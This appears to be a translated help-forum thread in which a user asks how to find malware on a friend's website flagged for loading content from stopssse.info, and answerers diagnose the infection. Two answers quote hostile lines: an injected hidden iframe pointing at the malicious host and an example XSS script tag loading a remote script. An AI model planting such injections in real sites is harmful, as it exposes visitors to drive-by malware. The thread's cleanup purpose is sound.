Como posso testar se um site está infectado por malware?

Navegue suas respostas
5

Alguns amigos meus têm um site (www.kennelsoffie.dk) e estou tentando ajudá-los quando houver algum problema. No entanto, desta vez eu não consigo descobrir. Quando visito o site usando o Google Chrome, recebo uma página de aviso afirmando que a página que estou tentando visitar contém elementos de stopssse.info.

Eu não conheço nenhum PHP, então eu simplesmente baixei o site completo incluindo backups do banco de dados (que são arquivos .sql). Então, eu procurei todos os arquivos por stopssse, mas não encontrei nada.

Eu também testei o site com siteadvisor.com e diz "Testamos este site e não encontramos nenhum problema significativo".

O PHP pode ocultar uma referência ao site de malware, por isso não consigo encontrá-lo com uma pesquisa simples? Se sim, como você pode encontrá-lo?

    
por CruelIO 01.09.2009 / 13:56

8 respostas

5

Eu encontrei isso na fonte gerada 

<iframe height="0" width="0" src="http://stopssse.info/l.php?thx"style="display: none; visibility: hidden;">

Estava logo abaixo da tag body, não está na fonte da página, está sendo adicionada por javascript ofuscado

edit: se você olhar na parte inferior do link , verá uma função javascript realmente estranha. Essa é a função javascript ofuscada de que eu estava falando. Começa com 

function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var

A melhor aposta é encontrá-lo e removê-lo.

    
por 01.09.2009 / 14:32
2

Provavelmente você está lidando com ataques XSS .

Nesse caso, dois passos:

  • Analise o banco de dados, procurando por tags de "scripts" e livre-se delas.
  • Contrate um cara que conheça o PHP para corrigir os buracos em sua entrada de dados e defina uma política de higienização eficiente.
por 01.09.2009 / 14:05
1

O malware pode não estar no site, mas pode vir de material trazido de fontes externas, como anúncios.

    
por 01.09.2009 / 14:04
1

Se o site foi "infectado" por meio de scripts entre sites , o que você tem provavelmente é um usuário -submitido comentário em algum lugar que contém algo como isto: 

<SCRIPT SRC="http://stopssse.info/malware.js"></SCRIPT>

Mas observe que há muitas variações que tentam ocultar o fato de que um script externo é executado e que pode também modifique o URL de origem, fazendo com que sua pesquisa de string simples falhe.

    
por 01.09.2009 / 14:26
1

A versão do PHP-Fusion que está sendo executada no site parece ser a v6.01.3, que parece ser uma versão bastante antiga, então provavelmente seria uma boa ideia atualizá-la.

Parece ter havido alguns avisos de segurança para o PHP-Fusion, incluindo alguns problemas de injeções de SQL.

Lista completa de avisos para o PHP-Fusion aqui: link

    
por 01.09.2009 / 17:40
0

Procure por arquivos peculiares nos diretórios atuais. Pode haver um arquivo que foi carregado por meio de um formulário de upload não seguro que grava dados adicionais na saída. Diga a seu amigo para alterar as informações da conta dele e comece a analisar a segurança do site dele.

    
por 01.09.2009 / 14:02
0

Ele está lá, verifique os arquivos PHP (procure por stopssse).

    
por 01.09.2009 / 14:03
0

No caso geral, à procura de javascrot ofuscado, essa ferramenta costuma ser útil: Wepawet

    
por 03.09.2009 / 10:07

Tags

Como posso automatizar o backup de um servidor Quickbooks? O sshfs + encfs é estável?